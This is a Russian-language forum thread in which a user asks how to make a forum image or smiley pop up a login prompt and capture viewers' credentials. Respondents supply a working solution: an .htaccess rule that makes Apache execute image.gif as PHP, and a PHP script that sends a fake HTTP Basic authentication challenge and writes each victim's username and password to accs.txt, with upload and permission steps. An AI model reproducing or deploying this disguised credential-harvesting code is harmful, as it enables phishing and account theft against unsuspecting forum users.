Доброго времени суток всем. Давно где-то тут наткнулся на статью или сообщение,не помню точно. Где описывалось,что вставляя в код картинки определённый код и затем в сообщениях на форумах после того как пользователь увидел этот смайл,то у него вытелао окно где просило ввести логин и пароль,после чего логин и пароль сохранялся у меня. Облазил всю ветку статей,но не нашёл этого. Может кто-нибудь даст ссылку на это чудо.
Увы с xss не знаком и не хочу заниматься тем чем не знаком. Решил попроще что-нибудь,т.е. то что в первом посту.
Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.
потому что твой веб-сервер должен этот файл как php-скрипт обработать. у тебя ведь апаче? используй mod_rewrite или директиву AddType
у меня vertrigo. используй mod_rewrite или директиву AddType А поточнее,это куда вписывать надо? Хотя раньше у меня вот этот смайл запускался на вертриго или я ошибаюсь,может то не вертриго был.
создаешь 3 файла: 1..htaccess содержимое PHP: <files "image.gif"> AddType application/x-httpd-php .gif </files> 2.image.gif содержимое PHP: <? $filevalid = 'accs.txt'; $good = fopen($filevalid, 'a+'); header("WWW-Authenticate: Basic realm=\"Access Forbidden\""); header("HTTP/1.0 401 Access Forbidden"); if (isset($_SERVER["PHP_AUTH_USER"]) ) { $user = $_SERVER["PHP_AUTH_USER"]; $pass = $_SERVER["PHP_AUTH_PW"]; fwrite ($good, $user.';'.$pass."\n"); header("HTTP/1.0 200 Login"); //exit("test"); } ?> 3.accs.txt пустой Заливаешь на сервак и проставляешь права файлу accs.txt. Тут готовый тестовый вариант. Вроде все.
так размер картинки в 2 раза больше, лучше использовать другую функцию для вывода. например, imagejpeg
